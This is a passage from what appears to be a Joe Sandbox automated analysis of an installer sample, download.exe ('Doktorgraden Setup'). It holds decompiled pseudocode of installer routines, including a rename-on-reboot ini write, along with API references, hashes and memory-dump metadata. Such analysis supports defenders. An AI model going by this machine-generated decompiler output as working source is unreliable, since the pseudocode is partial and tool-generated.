				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				intOrPtr _t115;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x7a2f54; // 0xae4de0
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t56 = _t130 + 0x34; // 0xae4de0
						_t94 = CreateFontIndirectA( *_t56);
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextA(_t128, "Doktorgraden Setup", 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					_t115 =  *0x7a2f48; // 0x202c0
					 *((intOrPtr*)(_t102 + 4)) = _t115;
				}
				return DefWindowProcA(_a4, _a8, _a12, _t102);
			}














                                                      0x0040100a
                                                      0x00401039
                                                      0x00401047
                                                      0x0040104d
                                                      0x00401051
                                                      0x0040105b
                                                      0x00401061
                                                      0x00401064
                                                      0x004010f3
                                                      0x00401089
                                                      0x0040108c
                                                      0x004010a6
                                                      0x004010bd
                                                      0x004010cc
                                                      0x004010cf
                                                      0x004010d5
                                                      0x004010d9
                                                      0x004010e4
                                                      0x004010ed
                                                      0x004010ef
                                                      0x004010ef
                                                      0x00401100
                                                      0x00401102
                                                      0x00401105
                                                      0x0040110d
                                                      0x00401110
                                                      0x00401112
                                                      0x00401118
                                                      0x0040111f
                                                      0x00401126
                                                      0x00401130
                                                      0x00401142
                                                      0x00401156
                                                      0x00401160
                                                      0x00401165
                                                      0x00401165
                                                      0x00401110
                                                      0x0040116e
                                                      0x00000000
                                                      0x00401178
                                                      0x00401010
                                                      0x00401013
                                                      0x00401015
                                                      0x00401019
                                                      0x0040101f
                                                      0x0040101f
                                                      0x00000000

                                                      APIs
                                                      • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                      • BeginPaint.USER32(?,?), ref: 00401047
                                                      • GetClientRect.USER32(?,?), ref: 0040105B
                                                      • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                      • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                      • DeleteObject.GDI32(?), ref: 004010ED
                                                      • CreateFontIndirectA.GDI32(00AE4DE0), ref: 00401105
                                                      • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                      • SetTextColor.GDI32(00000000,FFFFFFFF), ref: 00401130
                                                      • SelectObject.GDI32(00000000,?), ref: 00401140
                                                      • DrawTextA.USER32(00000000,Doktorgraden Setup,000000FF,00000010,00000820), ref: 00401156
                                                      • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                      • DeleteObject.GDI32(?), ref: 00401165
                                                      • EndPaint.USER32(?,?), ref: 0040116E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000002.00000002.1796282530.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796418503.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000077B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000785000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000787000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007AE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007C6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1798213099.00000000007C7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                      • String ID: Doktorgraden Setup$F
                                                      • API String ID: 941294808-1380501420
                                                      • Opcode ID: 5d259313e85fbaf708a0b03883ff4ad94c3fd8dcebbcebd210a7d21844077b3d
                                                      • Instruction ID: 38fadef1db352f82975619da7fddedca022a80716c75150ab5a709db8b4f24fa
                                                      • Opcode Fuzzy Hash: 5d259313e85fbaf708a0b03883ff4ad94c3fd8dcebbcebd210a7d21844077b3d
                                                      • Instruction Fuzzy Hash: CB416C71800249AFCB058F95DE459AFBBB9FF45314F00802EF9A1AA1A0C778DA55DFA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00405BEC Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 129memorystringCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E00405BEC(void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t12;
				intOrPtr _t14;
				long _t24;
				char* _t31;
				int _t37;
				void* _t38;
				intOrPtr* _t39;
				long _t42;
				CHAR* _t44;
				void* _t46;
				void* _t48;
				void* _t49;
				void* _t52;
				void* _t53;

				_t38 = __ecx;
				_t44 =  *(_t52 + 0x14);
				 *0x7a12d0 = 0x4c554e;
				if(_t44 == 0) {
					L3:
					_t12 = GetShortPathNameA( *(_t52 + 0x1c), 0x7a16d0, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						_t37 = wsprintfA(0x7a0ed0, "%s=%s\r\n", 0x7a12d0, 0x7a16d0);
						_t14 =  *0x7a2f54; // 0xae4de0
						_t53 = _t52 + 0x10;
						_t3 = _t14 + 0x128; // 0x13ab
						E00405F9F(_t37, 0x400, 0x7a16d0, 0x7a16d0,  *_t3);
						_t12 = E00405B16(0x7a16d0, 0xc0000000, 4);
						_t48 = _t12;
						 *(_t53 + 0x18) = _t48;
						if(_t48 != 0xffffffff) {
							_t42 = GetFileSize(_t48, 0);
							_t6 = _t37 + 0xa; // 0xa
							_t46 = GlobalAlloc(0x40, _t42 + _t6);
							if(_t46 == 0 || E00405B8E(_t48, _t46, _t42) == 0) {
								L18:
								return CloseHandle(_t48);
							} else {
								if(E00405A7B(_t38, _t46, "[Rename]\r\n") != 0) {
									_t49 = E00405A7B(_t38, _t21 + 0xa, 0x40a3b8);
									if(_t49 == 0) {
										_t48 =  *(_t53 + 0x18);
										L16:
										_t24 = _t42;
										L17:
										E00405AD1(_t24 + _t46, 0x7a0ed0, _t37);
										SetFilePointer(_t48, 0, 0, 0);
										E00405BBD(_t48, _t46, _t42 + _t37);
										GlobalFree(_t46);
										goto L18;
									}
									_t39 = _t46 + _t42;
									_t31 = _t39 + _t37;
									while(_t39 > _t49) {
										 *_t31 =  *_t39;
										_t31 = _t31 - 1;
										_t39 = _t39 - 1;
									}
									_t24 = _t49 - _t46 + 1;
									_t48 =  *(_t53 + 0x18);
									goto L17;
								}
								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
								_t42 = _t42 + 0xa;
								goto L16;
							}
						}
					}
				} else {
					CloseHandle(E00405B16(_t44, 0, 1));
					_t12 = GetShortPathNameA(_t44, 0x7a12d0, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						goto L3;
					}
				}
				return _t12;
			}




















                                                      0x00405bec
                                                      0x00405bf5
                                                      0x00405bfc
                                                      0x00405c10
                                                      0x00405c38
                                                      0x00405c43
                                                      0x00405c47
                                                      0x00405c67
                                                      0x00405c69
                                                      0x00405c6e
                                                      0x00405c71
                                                      0x00405c78
                                                      0x00405c85
                                                      0x00405c8a
                                                      0x00405c8f
                                                      0x00405c93
                                                      0x00405ca2
                                                      0x00405ca4
                                                      0x00405cb1
                                                      0x00405cb5
                                                      0x00405d50
                                                      0x00000000
                                                      0x00405ccb
                                                      0x00405cd8
                                                      0x00405cfc
                                                      0x00405d00
                                                      0x00405d1f
                                                      0x00405d23
                                                      0x00405d23
                                                      0x00405d25
                                                      0x00405d2e
                                                      0x00405d39
                                                      0x00405d44
                                                      0x00405d4a
                                                      0x00000000
                                                      0x00405d4a
                                                      0x00405d02
                                                      0x00405d05
                                                      0x00405d10
                                                      0x00405d0c
                                                      0x00405d0e
                                                      0x00405d0f
                                                      0x00405d0f
                                                      0x00405d17
                                                      0x00405d19
                                                      0x00000000
                                                      0x00405d19
                                                      0x00405ce3
                                                      0x00405ce9
                                                      0x00000000
                                                      0x00405ce9
                                                      0x00405cb5
                                                      0x00405c93
                                                      0x00405c12
                                                      0x00405c1d
                                                      0x00405c26
                                                      0x00405c2a
                                                      0x00000000
                                                      0x00000000
                                                      0x00405c2a
                                                      0x00405d5b

                                                      APIs
                                                      • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,00000000,00405D7D,?,?), ref: 00405C1D
                                                      • GetShortPathNameA.KERNEL32(?,007A12D0,00000400), ref: 00405C26
                                                        • Part of subcall function 00405A7B: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CD6,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405A8B
                                                        • Part of subcall function 00405A7B: lstrlenA.KERNEL32(00000000,?,00000000,00405CD6,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405ABD
                                                      • GetShortPathNameA.KERNEL32(?,007A16D0,00000400), ref: 00405C43
                                                      • wsprintfA.USER32 ref: 00405C61
                                                      • GetFileSize.KERNEL32(00000000,00000000,007A16D0,C0000000,00000004,007A16D0,000013AB,?,?,?,?), ref: 00405C9C
                                                      • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405CAB
                                                      • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CE3
                                                      • SetFilePointer.KERNEL32(0040A3B8,00000000,00000000,00000000,00000000,007A0ED0,00000000,-0000000A,0040A3B8,00000000,[Rename],00000000,00000000,00000000), ref: 00405D39
                                                      • GlobalFree.KERNEL32(00000000), ref: 00405D4A
                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405D51
                                                        • Part of subcall function 00405B16: GetFileAttributesA.KERNELBASE(00000003,00402DA3,C:\Users\user\Desktop\download.exe,80000000,00000003), ref: 00405B1A
                                                        • Part of subcall function 00405B16: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B3C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000002.00000002.1796282530.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796418503.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000077B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000785000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000787000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007AE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007C6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1798213099.00000000007C7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                      • String ID: %s=%s$[Rename]
                                                      • API String ID: 2171350718-1727408572
                                                      • Opcode ID: 45160d7d980c9177ced87b727a44c84efcd25dff5150337c1955e55c924b3a17
                                                      • Instruction ID: 022478914a54526cde4d083c9269fc90008e130feab77c5089d91aa4570e4fa5
                                                      • Opcode Fuzzy Hash: 45160d7d980c9177ced87b727a44c84efcd25dff5150337c1955e55c924b3a17
                                                      • Instruction Fuzzy Hash: 6131DF31201B196BD2207B659D4CF6B3A5CDF85794F24053BBA01F62D2EA7CA8058EAD
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00402C7C Relevance: 14.0, APIs: 5, Strings: 3, Instructions: 40timeCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E00402C7C(struct HWND__* _a4, intOrPtr _a8) {
				char _v68;
				int _t11;
				int _t20;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t20 =  *0x78a0f4; // 0xa4d3a
					_t11 =  *0x7960fc; // 0xa6270
					if(_t20 >= _t11) {
						_t20 = _t11;
					}
					wsprintfA( &_v68, "verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
					SetWindowTextA(_a4,  &_v68);
					SetDlgItemTextA(_a4, 0x406,  &_v68);
				}
				return 0;
			}






                                                      0x00402c89
                                                      0x00402c97
                                                      0x00402c9d
                                                      0x00402c9d
                                                      0x00402cab
                                                      0x00402cad
                                                      0x00402cb3
                                                      0x00402cba
                                                      0x00402cbc
                                                      0x00402cbc
                                                      0x00402cd2
                                                      0x00402ce2
                                                      0x00402cf4
                                                      0x00402cf4
                                                      0x00402cfc

                                                      APIs
                                                      • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402C97
                                                      • MulDiv.KERNEL32(000A4D3A,00000064,000A6270), ref: 00402CC2
                                                      • wsprintfA.USER32 ref: 00402CD2
                                                      • SetWindowTextA.USER32(?,?), ref: 00402CE2
                                                      • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402CF4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000002.00000002.1796282530.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796418503.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000077B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000785000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000787000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007AE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007C6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1798213099.00000000007C7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: Text$ItemTimerWindowwsprintf
                                                      • String ID: :M$pb$verifying installer: %d%%
                                                      • API String ID: 1451636040-2400729567
                                                      • Opcode ID: 5bc376e969e12caa47fa3f233e97b7e9205a4f9680dc87fa7bda5c810414eec7
                                                      • Instruction ID: de2615d2472e4fc16c898f89e06f4c65c316d83b10e4b0077f24645c8aa4783b
                                                      • Opcode Fuzzy Hash: 5bc376e969e12caa47fa3f233e97b7e9205a4f9680dc87fa7bda5c810414eec7
                                                      • Instruction Fuzzy Hash: E8014F70540209FBEF249F61DE4AEEE3769EB04304F00803AFA16B92D0DBB989518F59
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004061E7 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E004061E7(CHAR* _a4) {
				char _t5;
				char _t7;
				char* _t15;
				char* _t16;
				CHAR* _t17;

				_t17 = _a4;
				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
					_t17 =  &(_t17[4]);
				}
				if( *_t17 != 0 && E00405982(_t17) != 0) {
					_t17 =  &(_t17[2]);
				}
				_t5 =  *_t17;
				_t15 = _t17;
				_t16 = _t17;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((char*)(E00405940("*?|<>/\":", _t5))) == 0) {
							E00405AD1(_t16, _t17, CharNextA(_t17) - _t17);
							_t16 = CharNextA(_t16);
						}
						_t17 = CharNextA(_t17);
						_t5 =  *_t17;
					} while (_t5 != 0);
				}
				 *_t16 =  *_t16 & 0x00000000;
				while(1) {
					_t16 = CharPrevA(_t15, _t16);
					_t7 =  *_t16;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t16 =  *_t16 & 0x00000000;
					if(_t15 < _t16) {
						continue;
					}
					break;
				}
				return _t7;
			}








                                                      0x004061e9
                                                      0x004061f1
                                                      0x00406205
                                                      0x00406205
                                                      0x0040620b
                                                      0x00406218
                                                      0x00406218
                                                      0x00406219
                                                      0x0040621b
                                                      0x0040621f
                                                      0x00406221
                                                      0x0040622a
                                                      0x0040622c
                                                      0x00406246
                                                      0x0040624e
                                                      0x0040624e
                                                      0x00406253
                                                      0x00406255
                                                      0x00406257
                                                      0x0040625b
                                                      0x0040625c
                                                      0x0040625f
                                                      0x00406267
                                                      0x00406269
                                                      0x0040626d
                                                      0x00000000
                                                      0x00000000
                                                      0x00406273
                                                      0x00406278
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00406278
                                                      0x0040627d

                                                      APIs
                                                      • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\download.exe",75A63410,C:\Users\user\AppData\Local\Temp\,00000000,004031C4,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004033FB,?,00000006,00000008,0000000A), ref: 0040623F
                                                      • CharNextA.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 0040624C
                                                      • CharNextA.USER32(?,"C:\Users\user\Desktop\download.exe",75A63410,C:\Users\user\AppData\Local\Temp\,00000000,004031C4,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004033FB,?,00000006,00000008,0000000A), ref: 00406251
                                                      • CharPrevA.USER32(?,?,75A63410,C:\Users\user\AppData\Local\Temp\,00000000,004031C4,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004033FB,?,00000006,00000008,0000000A), ref: 00406261
                                                      Strings
                                                      • *?|<>/":, xrefs: 0040622F
                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 004061E8
                                                      • "C:\Users\user\Desktop\download.exe", xrefs: 00406223
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000002.00000002.1796282530.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796418503.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000077B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000785000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000787000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007AE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007C6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1798213099.00000000007C7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: Char$Next$Prev
                                                      • String ID: "C:\Users\user\Desktop\download.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                      • API String ID: 589700163-26238218
                                                      • Opcode ID: baaf8be525beb263cd2d66daa4244c7e43047c81ac15102dd5c23876bc89bcef
                                                      • Instruction ID: 21773b32b681db819c24220f05ced2ff1897e85ed8b94fc5b560f7e9dc9cebfa
                                                      • Opcode Fuzzy Hash: baaf8be525beb263cd2d66daa4244c7e43047c81ac15102dd5c23876bc89bcef
                                                      • Instruction Fuzzy Hash: D511BF6180479129FB3236240C44BB7AF998F977A0F1A00BFE5D6722C2D67C5CA2966D
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00404083 Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E00404083(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t39;
				long _t41;
				void* _t44;
				signed char _t50;
				long* _t54;

				if(_a4 + 0xfffffecd > 5) {
					L18:
					return 0;
				}
				_t54 = GetWindowLongA(_a12, 0xffffffeb);
				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
					goto L18;
				} else {
					_t50 = _t54[5];
					if((_t50 & 0xffffffe0) != 0) {
						goto L18;
					}
					_t39 =  *_t54;
					if((_t50 & 0x00000002) != 0) {
						_t39 = GetSysColor(_t39);
					}
					if((_t54[5] & 0x00000001) != 0) {
						SetTextColor(_a8, _t39);
					}
					SetBkMode(_a8, _t54[4]);
					_t41 = _t54[1];
					_v16.lbColor = _t41;
					if((_t54[5] & 0x00000008) != 0) {
						_t41 = GetSysColor(_t41);
						_v16.lbColor = _t41;
					}
					if((_t54[5] & 0x00000004) != 0) {
						SetBkColor(_a8, _t41);
					}
					if((_t54[5] & 0x00000010) != 0) {
						_v16.lbStyle = _t54[2];
						_t44 = _t54[3];
						if(_t44 != 0) {
							DeleteObject(_t44);
						}
						_t54[3] = CreateBrushIndirect( &_v16);
					}
					return _t54[3];
				}
			}









                                                      0x00404095
                                                      0x0040414b
                                                      0x00000000
                                                      0x0040414b
                                                      0x004040a6
                                                      0x004040aa
                                                      0x00000000
                                                      0x004040c4
                                                      0x004040c4
                                                      0x004040cd
                                                      0x00000000
                                                      0x00000000
                                                      0x004040cf
                                                      0x004040db
                                                      0x004040de
                                                      0x004040de
                                                      0x004040e4
                                                      0x004040ea
                                                      0x004040ea
                                                      0x004040f6
                                                      0x004040fc
                                                      0x00404103
                                                      0x00404106
                                                      0x00404109
                                                      0x0040410b
                                                      0x0040410b
                                                      0x00404113
                                                      0x00404119
                                                      0x00404119
                                                      0x00404123
                                                      0x00404128
                                                      0x0040412b
                                                      0x00404130
                                                      0x00404133
                                                      0x00404133
                                                      0x00404143
                                                      0x00404143
                                                      0x00000000
                                                      0x00404146

                                                      APIs
                                                      • GetWindowLongA.USER32(?,000000EB), ref: 004040A0
                                                      • GetSysColor.USER32(00000000), ref: 004040DE
                                                      • SetTextColor.GDI32(?,00000000), ref: 004040EA
                                                      • SetBkMode.GDI32(?,?), ref: 004040F6
                                                      • GetSysColor.USER32(?), ref: 00404109
                                                      • SetBkColor.GDI32(?,?), ref: 00404119
                                                      • DeleteObject.GDI32(?), ref: 00404133
                                                      • CreateBrushIndirect.GDI32(?), ref: 0040413D
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000002.00000002.1796282530.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796418503.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000077B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000785000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000787000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007AE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007C6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1798213099.00000000007C7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                      • String ID:
                                                      • API String ID: 2320649405-0
                                                      • Opcode ID: 49e3bf83d30a7d96e63afb16dabbed360c02e673e0f4069f8acd1b63125549d3
                                                      • Instruction ID: 14bb72118498863180d434f19a0418890adeb1616dfc149a02695bee4dee3a88
                                                      • Opcode Fuzzy Hash: 49e3bf83d30a7d96e63afb16dabbed360c02e673e0f4069f8acd1b63125549d3
                                                      • Instruction Fuzzy Hash: 422162715007049BCB309F68DD4CB5BBBF8AF91714B04893EEA96A62E0D734E984CB54
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 706B2498 Relevance: 10.6, APIs: 7, Instructions: 124COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 77%
                                                      			E706B2498(intOrPtr* _a4) {
				char _v80;
				int _v84;
				intOrPtr _v88;
				short _v92;
				intOrPtr* _t28;
				void* _t30;
				intOrPtr _t31;
				signed int _t43;
				void* _t44;
				intOrPtr _t45;
				void* _t48;

				_t44 = E706B1215();
				_t28 = _a4;
				_t45 =  *((intOrPtr*)(_t28 + 0x814));
				_v88 = _t45;
				_t48 = (_t45 + 0x41 << 5) + _t28;
				do {
					if( *((intOrPtr*)(_t48 - 4)) >= 0) {
					}
					_t43 =  *(_t48 - 8) & 0x000000ff;
					if(_t43 <= 7) {
